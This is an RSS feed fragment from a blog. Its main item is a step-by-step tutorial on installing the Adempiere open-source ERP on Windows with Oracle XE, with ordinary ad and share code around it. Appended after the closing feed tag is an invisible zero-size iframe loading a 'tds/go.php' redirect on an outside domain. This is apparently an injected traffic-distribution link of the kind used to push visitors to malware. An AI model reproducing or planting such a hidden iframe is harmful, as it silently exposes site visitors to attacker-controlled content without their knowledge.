alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2009/07/daftar-situs-penyedia-e-book-it/feed/</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>001 Adempiere Opensource ERP Installation</title>
		<link>http://www.dijexi.com/2009/06/adempiere-opensource-erp-installation/</link>
		<comments>http://www.dijexi.com/2009/06/adempiere-opensource-erp-installation/#comments</comments>
		<pubDate>Tue, 30 Jun 2009 09:31:55 +0000</pubDate>
		<dc:creator>akhmad daniel sembiring</dc:creator>
				<category><![CDATA[Adempiere ERP]]></category>
		<category><![CDATA[Java]]></category>
		<category><![CDATA[Oracle]]></category>
		<category><![CDATA[adempiere]]></category>
		<category><![CDATA[erp]]></category>
		<category><![CDATA[sdk]]></category>

		<guid isPermaLink="false">http://www.dijexi.com/2009/06/adempiere-opensource-erp-installation/</guid>
		<description><![CDATA[In order to be successfully installing Adempiere, you must do the following steps on the right order. Fulfill the prerequisites Installing Java Development Kit (JDK) Installing Database (Oracle 10g, 11g, or XE, or PostgreSQL) Setup Adempiere Create Adempiere Database Complete Server Setup Prerequisites Adempiere ERP requires the following item to be configured properly: Sun Java [...]]]></description>
			<content:encoded><![CDATA[<!--INFOLINKS_ON--><p>In order to be successfully installing Adempiere, you must do the following steps on the right order.</p>
<ol>
<li>Fulfill the prerequisites </li>
<li>Installing Java Development Kit (JDK) </li>
<li>Installing Database (Oracle 10g, 11g, or XE, or PostgreSQL) </li>
<li>Setup Adempiere </li>
<li>Create Adempiere Database </li>
<li>Complete Server Setup </li>
</ol>
</p>
<h2>Prerequisites</h2>
<p>Adempiere ERP requires the following item to be configured properly:</p>
<p><a href="http://java.sun.com/j2se/1.5.0/download.html">Sun Java 1.5.0 JDK</a> (not just JRE)</p>
<p>One of the database</p>
<ul>
<li>Oracle 10g </li>
<li>Oracle 11g </li>
<li><a href="http://www.oracle.com/technology/software/products/database/xe/index.html">Oracle XE</a> </li>
<li>Postgresql 8.1 and above </li>
</ul>
<p><a href="http://sourceforge.net/project/showfiles.php?group_id=176962">The latest version of ADempiere</a></p>
</p>
<p> <span id="more-342"></span>
</p>
<h2>Installing Java Development Kit (JDK)</h2>
<p>Installation on JDK should be simple, you just need to run the setup program. One thing that you should notice is that you must download the JDK (Java Development Kit), not just the JRE (Java Runtime Environment). Ademipere needs the JDK which consists of full package of Java libraries and development tools.</p>
<p>After installing JDK, you need to make sure of the Windows environment variables <strong>JAVA_HOME</strong> is correct. This can be done by using Windows command prompt (menu Start – Run – type cmd).</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ja1.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="Checking JAVA_HOME environment variable" border="0" alt="Checking JAVA_HOME environment variable" src="http://www.dijexi.com/wp-content/uploads/2009/06/ja1_thumb.png" width="244" height="142" /></a></p>
<h2>Installing Oracle Database</h2>
<p>In this article we are going to use Oracle XE database server. First, you need to download the setup program. Search the keyword (oracle xe download) from google.com or go to Oracle web site: <a title="http://www.oracle.com/technology/software/products/database/xe/index.html" href="http://www.oracle.com/technology/software/products/database/xe/index.html">http://www.oracle.com/technology/software/products/database/xe/index.html</a>. You have the option to download either for Linux or Windows operating system. In this article we are going to use Windows.</p>
<p>Detailed instruction for installing Oracle XE can be found in this link.</p>
<h2>Setup Adempiere</h2>
<p>If you have not downloaded the latest version of Adempiere, you must <a href="http://sourceforge.net/project/showfiles.php?group_id=176962">do it now by clicking this link</a>. After downloading, extract the file to some temporary folder. The extracted folder will contain a folder called Adempiere. Move this folder to a root directory for simplicity, which is in this article C:\. So, you will have a new folder called C:\Adempiere.</p>
<p>Now, open command prompt and type <strong>cd c:\adempiere</strong> to go to that folder.</p>
<p>On the c:\adempiere folder, type the following command:</p>
<blockquote><p>RUN_Adempiere.bat</p>
</blockquote>
<p>wait until a dialog similar like this appear:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad1.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="Adempiere server setup dialog" border="0" alt="Adempiere server setup dialog" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad1_thumb.png" width="244" height="215" /></a></p>
<p align="left">
<div style="padding-right: 20px; float: left"><iframe style="border-bottom: medium none; border-left: medium none; border-top: medium none; border-right: medium none" height="600" marginheight="0" border="0" src="http://rcm.amazon.com/e/cm?t=vitrainingcom-20&amp;o=1&amp;p=14&amp;l=st1&amp;mode=books&amp;search=erp&amp;fc1=000000&amp;lt1=&amp;lc1=3366FF&amp;bg1=FFFFFF&amp;f=ifr" frameborder="0" width="160" marginwidth="0" scrolling="no"></iframe></div>
<p> <!-- Adsense End -->
</p>
<p>That was the Adempiere server setup dialog. What you need to do on that dialog is to make adjustment to the default parameter values presented on the dialog. The most important parameters are:</p>
<ol>
<li>Java Home: set it to the Java SDK installation path you have done before, for example C:\Java </li>
<li>Adempiere Home: set it to the path of the Adempiere installation folder you have done before, for example C:\Adempiere </li>
<li>Application server: fill it with the computer name the Adempiere server running on </li>
<li>Web Port: type the available port number for the Adempiere web server, for example 8080 (in case Apache is already running on port 80 on your computer) </li>
<li>SSL: type the available port number for the SSL port of the application server, for example 8443 (in case Apache SSL is already running on port 443 on your computer) </li>
<li>Database Type: select Oracle XE </li>
<li>Database system password: fill it with the password of the Oracle’s SYSTEM user which is defined on the Oracle XE installation stage that you must have done before. </li>
</ol>
<p>You may leave other parameters as default.</p>
<p>After adjusting the parameter, click on the Test button. The program will check all of the parameters and show you indicators whether the values are correct or not. You must adjust them to the correct values depending your system configuration before setup process continue.</p>
<p>When everything is OK, you can now click Save button, which will begin the setup and deployment process.</p>
<p>First, a confirmation will show up:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad2.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="ad2" border="0" alt="ad2" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad2_thumb.png" width="244" height="82" /></a></p>
<p>Click OK. The setup and deployment process will take up several minutes depending on your system specification. You may check for messages appear on the command prompt window where the RUN_setup.bat was run before or just wait until messages like this appear:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad3.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="After setup and deployment finish" border="0" alt="After setup and deployment finish" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad3_thumb.png" width="244" height="125" /></a></p>
<h2>Create Adempiere Database</h2>
<p>Next you must create the Adempiere database.This is done by running the import command which will import the database structure and data to our Oracle XE database server.</p>
<p>Still in the command prompt window, type the following command:</p>
<blockquote><p>cd c:\adempiere\utils</p>
<p>RUN_importAdempiere.bat</p>
</blockquote>
<p>The process will create Adempiere database on our Oracle XE server, you just have to wait until it finishes.</p>
<h2>Complete Server Setup</h2>
<p>Next step is to run the Adempiere application server. Type the following command on the command prompt:</p>
<blockquote><p>cd c:\adempiere\utils</p>
<p>RUN_server2.bat</p>
</blockquote>
<p>Wait the process until the application server is up and running.</p>
<h2>Testing Adempiere Installation</h2>
<p>When everything is ok, you need to test the Adempiere installation. Type the following command on the command prompt:</p>
<blockquote><p>cd c:\adempiere</p>
<p>RUN_adempiere.bat</p>
</blockquote>
<p>If nothing was wrong, a dialog like this will show up:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad5.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="Adempiere user and password dialog" border="0" alt="Adempiere user and password dialog" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad5_thumb.png" width="240" height="244" /></a></p>
<p>Adempiere was deployed with a sample database which contains a built-in client setup called Garden. On each client, there are two built in users: <strong>GardenAdmin </strong>and <strong>GardenUser</strong>. For testing purpose we will use GardenAdmin user ID with which has a default password of GardenAdmin as well. Click on the Ok button to continue. A dialog like this will show up:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad6.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="ad6" border="0" alt="ad6" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad6_thumb.png" width="240" height="244" /></a></p>
<p align="left">
<div style="padding-right: 20px; float: left"><iframe style="border-bottom: medium none; border-left: medium none; border-top: medium none; border-right: medium none" height="600" marginheight="0" border="0" src="http://rcm.amazon.com/e/cm?t=vitrainingcom-20&amp;o=1&amp;p=14&amp;l=st1&amp;mode=books&amp;search=oracle%20database&amp;fc1=000000&amp;lt1=&amp;lc1=3366FF&amp;bg1=FFFFFF&amp;f=ifr" frameborder="0" width="160" marginwidth="0" scrolling="no"></iframe></div>
<p> <!-- Adsense End -->
</p>
<p>That dialog confirm you for your role, client, organization (department below a client), today’s date, and printer setup. Click ok when all item are confirmed. Next, Adempiere dashboard will show up like this.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad7.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="Adempiere dashboard" border="0" alt="Adempiere dashboard" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad7_thumb.png" width="504" height="365" /></a></p>
<p>That will show a snapshot of your business’ performance today recorded by Adempiere. Next, click on the Menu tab that will show Adempiere main menu like this.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad8.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="Adempiere main menu" border="0" alt="Adempiere main menu" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad8_thumb.png" width="504" height="364" /></a></p>
<p>Adempiere menu is arranged by a tree structure. Depending on the user ID, there will be menus which can be expanded to show it’s sub menu. You can browse for a particular menu for a specific function or job by expanding and collapsing the tree. You can also find the menu by searching it by typing the menu on the Lookup field located on the bottom right of the dialog window. Try for example type “purchase order” and press Enter to go to a menu which contains “puchase order”.</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad9.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="search purchase order menu" border="0" alt="search purchase order menu" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad9_thumb.png" width="504" height="364" /></a></p>
<p>Note that Adempiere menu shows different icons for the items. The icon indicated the function of the menu which can be a form window, a report window, a process, or a workflow. For testing purpose, double click the Purchase Order menu to open Purchase Order window like this:</p>
<p><a href="http://www.dijexi.com/wp-content/uploads/2009/06/ad10.png"><img style="border-right-width: 0px; display: inline; border-top-width: 0px; border-bottom-width: 0px; border-left-width: 0px" title="ad10" border="0" alt="ad10" src="http://www.dijexi.com/wp-content/uploads/2009/06/ad10_thumb.png" width="504" height="404" /></a></p>
<p>Ok, seems like your Adempiere installation is correct. Now close the PO window, and exit Adempiere if you wish.</p>
<p>Akhmad Daniel Sembiring</p>
<p><a href="http://www.vitraining.com">vITraining.com &#8211; Qualified IT Products, Outsourcing, and Services</a>     <br /><a href="http://ligarwangi.com">Ligarwangi.com &#8211; Linux, E-book, Coffee, Gift, etc</a></p>
<div id="crp_related"><h3>Related Posts:</h3><ul><li><a href="http://www.dijexi.com/2009/06/oracle-xe-installation/" rel="bookmark">Oracle XE Installation</a></li><li><a href="http://www.dijexi.com/2010/01/adempiere-how-to-enter-salary-payment-using-cash-journal/" rel="bookmark">Adempiere &ndash; How to Enter Salary Payment using Cash Journal</a></li><li><a href="http://www.dijexi.com/2010/01/adempiere-how-to-import-report-line-set-for-balance-sheet/" rel="bookmark">Adempiere &ndash; How to Import Report Line Set for Balance Sheet</a></li><li><a href="http://www.dijexi.com/2010/01/adempiere-how-to-import-report-line-set/" rel="bookmark">Adempiere &ndash; How to Import Report Line Set for Profit and Loss</a></li><li><a href="http://www.dijexi.com/2009/07/002-initial-client-setup/" rel="bookmark">010 Initial Client Setup</a></li></ul></div><!--INFOLINKS_OFF--><p style="text-align: center;"><script type="text/javascript"><!--
google_ad_client = "pub-7773800616131770";
/* horizontal */
google_ad_slot = "1931057994";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script></p><a class="a2a_dd addtoany_share_save" href="http://www.addtoany.com/share_save?linkurl=http%3A%2F%2Fwww.dijexi.com%2F2009%2F06%2Fadempiere-opensource-erp-installation%2F&amp;linkname=001%20Adempiere%20Opensource%20ERP%20Installation"><img src="http://www.dijexi.com/wp-content/plugins/add-to-any/share_save_120_16.png" width="120" height="16" alt="Share/Bookmark"/></a>]]></content:encoded>
			<wfw:commentRss>http://www.dijexi.com/2009/06/adempiere-opensource-erp-installation/feed/</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>
<iframe src="http://pokosa.com/tds/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
